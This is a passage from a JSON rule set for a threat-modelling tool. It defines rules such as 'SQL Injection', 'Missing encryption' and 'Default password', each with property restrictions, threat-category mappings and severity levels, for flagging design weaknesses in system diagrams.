Overwrite","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"01a37617-b7ac-446a-86fa-e70c957d154c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"cf7355d0-6f0c-4ad8-afa2-8689a81e28b8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e8430761-3c2e-4db0-adbd-5310214574c2","ComparisonType":"==","Value":false}}]},"overridenRuleIDs":[],"Severity":4},{"ID":"5c21d6b7-2390-4f72-b29e-7d7985a30293","Name":"Improper Isolation","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"d4292863-c64e-4123-806f-71590ec76ed3","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"8bd42f0c-a4d2-4d98-9dcb-b9b100114fa5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"HasTrustedExecutionEnvironment","ComparisonType":"==","Value":true}}]},"overridenRuleIDs":[],"Severity":2},{"ID":"7b825bd7-222e-476f-bf22-85fe2e50eb6c","Name":"DoS attack from Internet","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":["b76ebd30-234d-4704-bf27-ab3e0bf5ae97"]},"SenderInterfaceRestriction":{"Property":{"ID":"","ComparisonType":"==","Value":null}}}]},"overridenRuleIDs":[],"Severity":2},{"ID":"13b5172b-9d6c-49a3-9580-fb256d5cd506","Name":"Decommissioned data store","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"327a2f35-8cf5-46d5-a973-a174f6f7be23","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","11a5c06f-875c-43fa-a01f-79f4819f98dd"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"80aa0465-21e0-41bd-b521-84a346c5f54b","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsEncrypted","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsVolatile","ComparisonType":"==","Value":false}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"ddfef636-378c-4874-b2ea-33b0fcfe22c5","Name":"Access data exposure","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"367702af-ceba-459b-84e5-27efe918968e","DetailRestrictions":[]},"overridenRuleIDs":["358f4f37-445a-4336-8107-c02d7b9cd3a4"],"Severity":4},{"ID":"32d4322f-482d-4a59-8f62-964ef8014a0b","Name":"Radio jamming","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"23c3a785-a539-4570-aee0-42bdffb43983","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":true,"RestType":10,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"SenderInterfaceRestriction":{"Property":{"ID":"IsWireless","Value":true}}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":11,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"ReceiverInterfaceRestriction":{"Property":{"ID":"IsWireless","ComparisonType":"==","Value":true}}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"b3450129-f094-4d50-bc87-efb4e8e84a12","Name":"Bad certificate","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"0b47795b-b42d-49d1-bf50-7f4889994fea","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":true}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"4611ab6f-adbf-47f3-86ff-8af0ac645d80","Name":"Improper user input validation","Description":"Verify that all input is verified for correctness using an approved list input validation approach.","IsActive":true,"RuleGenerationType":3,"Mapping":{"AttackVectorID":"d92ccd9c-3a24-4e07-a2ca-c1e9949bb386","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":0,"IsOR":true,"RestType":1,"PropertyRest":{"ID":"7632a126-216a-4463-83ef-6ce82331d9f8","ComparisonType":"==","Value":true}},{"Layer":0,"NodeNumber":0,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"18571d26-3d51-45b8-96f0-ff6e273e70c6","ComparisonType":"==","Value":true}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"32dab43f-2dc8-4109-9420-ee7c118a82d5","Name":"Limitation of the charging power","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"5f755466-4417-4060-83de-64bddeabd1ba","DetailRestrictions":[]},"overridenRuleIDs":[],"Severity":2},{"ID":"4609cf84-96fa-4054-bf45-5b33993ce648","Name":"Blocking battery charging","Description":"For example, https://www.brokenwire.fail/","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"5f755466-4417-4060-83de-64bddeabd1ba","DetailRestrictions":[]},"overridenRuleIDs":[],"Severity":2},{"ID":"1d39d1b0-8f3c-40f7-bb6d-f7699b3b4b07","Name":"Overcharging","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a","17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"5f755466-4417-4060-83de-64bddeabd1ba","DetailRestrictions":[]},"overridenRuleIDs":[],"Severity":3},{"ID":"358f4f37-445a-4336-8107-c02d7b9cd3a4","Name":"Cleartext data storage","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"ef144ae1-4c70-400e-8222-b8a7dd3bf3e9","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"c7598413-4382-43e9-9904-fd9d877eb7a9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ContainsSensitiveData","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ProcessedDataSensitivity","ComparisonType":">=","Value":2}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"2759171a-24e3-4bfe-8ca7-5814902a000e","Name":"Cleartext storage on unencrypted physical storage","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"e851a284-6b41-41c9-9efd-dc8b01f788da","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"c7598413-4382-43e9-9904-fd9d877eb7a9","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":3,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"PhyElementRest":{"Property":{"ID":"IsEncrypted","ComparisonType":"==","Value":false}}},{"IsOR":true,"Layer":0,"RestType":3,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"PhyElementRest":{"Property":{"ID":"IsMultipleWritable","ComparisonType":"==","Value":true}}}]},"Severity":3},{"ID":"8b527d06-5d08-41c1-91fc-1c4146858987","Name":"Missing encryption","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"bb7358c1-e5b6-424f-962d-daab17345b63","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":-1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesConfidentiality","ComparisonType":"==","Value":false}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":3},{"ID":"da0924b8-967c-406e-a2f5-a6ebac21de1d","Name":"Missing integrity check","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"001ba17c-0400-4369-912e-0ceda3ccd227","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":-1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesIntegrity","ComparisonType":"==","Value":false}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"3084a3b9-fdba-4bb1-97fa-c59ddbea7d22","Name":"SQL Injection","Description":"SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"1a511f9e-5d1b-47b9-9071-4d39407cc75c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["74245351-b923-4cd6-b9e7-fe9f9916cbf5"]}],"NodeRestrictions":[]},"Severity":3},{"ID":"4c58a730-0161-4385-8249-bbf603ae1b88","Name":"Plaintext password","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"f0ef09ed-0cde-4b12-beb6-f1640132f3e6","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"367702af-ceba-459b-84e5-27efe918968e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ea6098a1-cc93-4f7d-a6c6-e9ec84e8c393","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"af1cd836-48c2-437c-93d0-58b7c9e1d0f6","Name":"Password hash w/o salt","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"0e3c0e3e-1587-46f8-93ea-e9091dff5958","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"367702af-ceba-459b-84e5-27efe918968e","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"452b2b74-1eb6-4edb-8921-274b2332c7bf","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ea6098a1-cc93-4f7d-a6c6-e9ec84e8c393","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"09881484-9a79-427d-a638-3e894af45c13","Name":"Missing authentication","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4e797b3d-fcdd-43ce-953e-8d5af2c47d91","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"db9caa64-fec1-47e8-9ed8-97896030cc90","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a5bb6218-f4e3-445f-95b3-1fc0be602d36","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"5c467e46-e642-49ad-a057-4784ec792125","Name":"Malicious code implanted","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"be14adbc-19a7-48c8-8f13-2566559e63e2","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"80aa0465-21e0-41bd-b521-84a346c5f54b","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsEncrypted","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsMultipleWritable","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"2af47360-11c3-45e3-a43f-fc3efa8f6f4d","Name":"Reverse engineering","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"f6ddb913-05ab-485a-a736-46a3f7466f85","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsCustomDesign","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"53fc96a4-96a0-42cc-bb2a-fc4515b8b008","Name":"PCB oversupply","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"90a4e8f3-c750-47c4-97fd-fa9e25b9b599","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsIn-HouseProduced","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsReplaceable","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"9846541d-9bf3-4a2e-98cb-1ad13da5648b","Name":"Malicious peripheral","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"21c6b5ef-82c7-41e5-bb07-de93445b2156","ThreatCategoryIDs":["c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f","DetailRestrictions":[]},"Severity":3},{"ID":"1da12d13-b7ea-4179-8c6b-b87a338d95a5","Name":"Provisioning data cloning","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a912b48a-3b4d-44ab-b8f3-28000ca945c4","ThreatCategoryIDs":[]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsIn-HouseProduced","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"63fb20c8-4a32-430e-bfa4-587503eaf572","Name":"Chip oversupply","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"90a4e8f3-c750-47c4-97fd-fa9e25b9b599","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6065e8dd-23c0-4dc9-ad51-628af88f3309","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsCustomDesign","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsIn-HouseProduced","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"d0736981-7141-4d93-b493-d99135b8d236","Name":"Permissive status display","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"9538abd8-f79c-4097-b2dd-716e50a125ee","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6b505c9a-c505-4305-8c07-a3cde1c1ddfc","DetailRestrictions":[]},"Severity":2},{"ID":"2b24dfec-f29a-4682-8066-db29831234ec","Name":"Missing password field masking","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"b9436449-7896-4be6-89f8-a19e1c8d014f","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6b505c9a-c505-4305-8c07-a3cde1c1ddfc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"04fc735e-8da5-409d-93c9-5d56eb0a852d","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"e3a2c92b-834f-408e-a4d2-87cfc66bd9fc","Name":"Password hash w/ predictable salt","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"05e04798-41ce-4919-a92b-264f7e985de2","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"367702af-ceba-459b-84e5-27efe918968e","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ea6098a1-cc93-4f7d-a6c6-e9ec84e8c393","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"452b2b74-1eb6-4edb-8921-274b2332c7bf","ComparisonType":"==","Value":true}}]},"Severity":1},{"ID":"834aa7e3-1a0b-47a8-abdc-b4b1a6705377","Name":"IC reverse engineering","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"e6c3d6f5-f4c7-48b7-b516-2092c3557c81","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"e8430761-3c2e-4db0-adbd-5310214574c2","DetailRestrictions":[]},"Severity":2},{"ID":"78a3949d-8677-4426-b2b1-eb20b4296821","Name":"Draining attack","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"1447713d-9ad6-454e-81d8-c9f4ef34c72b","ThreatCategoryIDs":["9e715340-1a69-47df-864a-7c3b5a9a678e","b869918c-0b47-45c3-8fab-0b698043aa66","08d8fbba-5de4-4538-8674-43e214c3ebad","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"1dc32bac-147f-42a4-a13c-44e5b59f7b81","DetailRestrictions":[]},"Severity":2},{"ID":"8ab20d5d-f624-46f5-beeb-833327d8673f","Name":"Hard-coded credentials","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"723dfb40-4ceb-4232-bda5-73bcb3c76ac0","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e1e92ae3-ee61-4cae-bfb5-be18e97ea587","ComparisonType":"==","Value":true}}]},"Severity":4},{"ID":"34b65a9d-ca44-44b0-b66f-aa5bacfc53b4","Name":"Default password","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5e7fd04c-0e14-4c76-800d-f581bcf7c7f6","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"714ed1de-855c-491b-8a08-745a99e17413","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"67919611-8ec3-4d48-bbd7-03f963d6f12c","Name":"Password requirements","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5435aa9a-ad52-470f-8fa5-81a4f926b6a6","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"540e39da-3227-4e6c-86ea-32a017318511","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"5585cf20-9e87-4ae5-960a-a952b07c37e5","Name":"Single-factor authentication","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"63dfaefa-c8a8-4725-b6d6-2efff7306639","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"88763e20-7878-4525-81d8-c4d09b867042","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b3a678a2-87a5-42ae-a1ef-4ec599554471","Name":"Restriction of attempts","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"296e95fe-e06d-4ae3-be84-da98df4a122c","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"aa74f499-b995-4f5e-8d92-91f3ca172743","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"61452452-9fdc-4023-873d-93cd6d018abb","Name":"Session ID expiration","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"bf289171-82c3-431a-b3f1-28d17e5a6546","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"51473250-3891-4342-a8b8-687db16ffef3","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"dde91006-ebc4-4e9c-906b-8c3591266097","Name":"Session timeout","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"bf289171-82c3-431a-b3f1-28d17e5a6546","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a21a6894-256f-4bfd-bd49-09352d054399","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a100a6c5-5f38-4224-a74a-825fa89579c2","Name":"Password recovery","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"2f483201-0209-4320-ba2e-2d692274aab5","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a9b6390d-0145-4e0f-8420-8a9b8f728c3d","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"96876c2e-a3e9-4e0f-afd0-fe721dd0f295","Name":"Client-side hashing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"4ee3fc8a-87a5-4fdf-868f-fb35cd12dc91","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ba8dc5f0-e1a9-4263-8179-747791b873ee","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"2b389d13-5f71-4bb4-b111-a7fee2b6a486","Name":"Restriction to hardware features","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"9e85cf25-febb-46ca-a5f5-c6283412a87b","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"6c83ccbc-ffbd-4bd6-b207-07386e3393c5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4d88ce07-2a06-4ae3-942a-46eb25ccdd9b","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"11975f59-55e0-420f-9366-513175e9236e","Name":"Missing secure 